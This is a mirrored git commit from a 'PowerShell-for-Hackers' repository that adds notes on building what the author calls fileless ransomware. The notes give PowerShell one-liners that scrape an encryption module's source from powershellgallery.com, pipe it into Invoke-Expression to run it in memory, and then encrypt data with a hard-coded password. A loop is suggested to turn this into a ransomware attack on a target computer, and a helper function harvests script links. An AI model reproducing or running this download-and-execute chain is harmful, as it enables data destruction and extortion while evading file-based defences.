mirror of
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers.git
synced 2025-09-06 20:29:38 +00:00
Create cGpt.txt
This commit is contained in:
59
VideoNotes/cGpt.txt
Normal file
59
VideoNotes/cGpt.txt
Normal file
@@ -0,0 +1,59 @@
|
||||
# powerGallery
|
||||
|
||||
This one liner will load the neccessary files to encrypt a system straight from the trusted powershellgallery.com website.
|
||||
Used in conjunction with a simple for loop its is now fileless ransomware hosted and executed from your platform
|
||||
|
||||
```powershell
|
||||
([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex
|
||||
```
|
||||
|
||||
Next its as simple as running the commands stored in that module agaisnt the system
|
||||
In this instance we can encrypt a string, but why stop there?
|
||||
|
||||
```powershell
|
||||
$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"
|
||||
```
|
||||
|
||||
Combining them into a simple one liner. Together with yet another simple functionality the `for loop` you should be able to see the danger
|
||||
We could run fileless ransomware on a target computer all from a trusted source
|
||||
|
||||
```powershell
|
||||
([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex;$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"
|
||||
```
|
||||
|
||||
You can use this function to grab the links of all the .ps1 files in a module from the powershell gallery website
|
||||
|
||||
```powershell
|
||||
function Get-Ps1Urls {
|
||||
param ([string]$Url)
|
||||
try {
|
||||
$content = Invoke-RestMethod -Uri $Url
|
||||
$regex = '<a\s+[^>]*href="([^"]+\.ps1)"[^>]*>'
|
||||
$matches = [regex]::Matches($content, $regex)
|
||||
$baseURL = "https://www.powershellgallery.com"
|
||||
$ps1Links = @()
|
||||
foreach ($match in $matches) {
|
||||
$relativeLink = $match.Groups[1].Value
|
||||
$fullLink = $baseURL + $relativeLink
|
||||
$ps1Links += $fullLink
|
||||
}
|
||||
return $ps1Links
|
||||
}
|
||||
catch {
|
||||
Write-Error "An error occurred: $_"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Syntax:
|
||||
|
||||
```powershell
|
||||
$urls = get-Ps1Urls -Url "https://www.powershellgallery.com/packages/PSAES/1.0.0.5"
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
$urls = @("https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1")
|
||||
|
||||
foreach ($url in $urls){([regex]::Matches((irm "$url"), '(?<=<td class="fileContent .*?">).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?<!<#)>(?![^#])',''}
|
||||
```
|
Reference in New Issue
Block a user